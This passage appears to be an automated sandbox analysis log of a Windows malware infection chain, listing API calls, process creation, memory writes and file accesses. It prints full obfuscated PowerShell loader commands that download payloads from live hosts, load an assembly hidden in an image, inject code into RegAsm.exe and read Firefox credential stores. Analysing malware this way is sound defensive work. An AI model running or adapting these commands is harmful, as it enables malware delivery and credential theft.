                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,30_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,30_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,30_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,30_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00407877 FindFirstFileW,FindNextFileW,30_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0044E8F9 FindFirstFileExA,30_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,30_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,30_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,30_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,30_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00418981 memset,GetSystemInfo,21_2_00418981
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_23-34250
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,21_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,30_2_0041CBE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10004AB4 mov eax, dword ptr fs:[00000030h]17_2_10004AB4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00443355 mov eax, dword ptr fs:[00000030h]30_2_00443355
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_1000724E GetProcessHeap,17_2_1000724E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_10002639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_10002B1C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00434BD8 SetUnhandledExceptionFilter,30_2_00434BD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_0043503C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_0043BB71

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe30_2_00412132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00419662 mouse_event,30_2_00419662
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'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'+[ChaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3ED5.tmp" "c:\Users\user\AppData\Local\Temp\uvrrkyhh\CSC53416C506E684743ABB03B3747B68267.TMP"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jfaasddkn"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lzfstnomboxo"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wcklufzfxwpbazt"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'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'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87A7.tmp" "c:\Users\user\AppData\Local\Temp\lkzgbmkm\CSCA61F80875D1340AC807DD81469F56ED.TMP"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: RegAsm.exe, 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerm~3R4
                    Source: RegAsm.exe, 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerChrome77 [Compatibility Mode]]|
                    Source: RegAsm.exe, 00000011.00000002.872848173.0000000000883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
                    Source: RegAsm.exe, 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmp, logs.dat.17.dr Binary or memory string: [Program Manager]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_10002933 cpuid 17_2_10002933
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,30_2_0045201B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,30_2_004520B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,30_2_00452143
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,30_2_00452393
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,30_2_00448484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,30_2_004524BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,30_2_004525C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,30_2_00452690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,30_2_0044896D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoA,30_2_0040F90C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: IsValidCodePage,GetLocaleInfoW,30_2_00451D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,30_2_00451FD0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
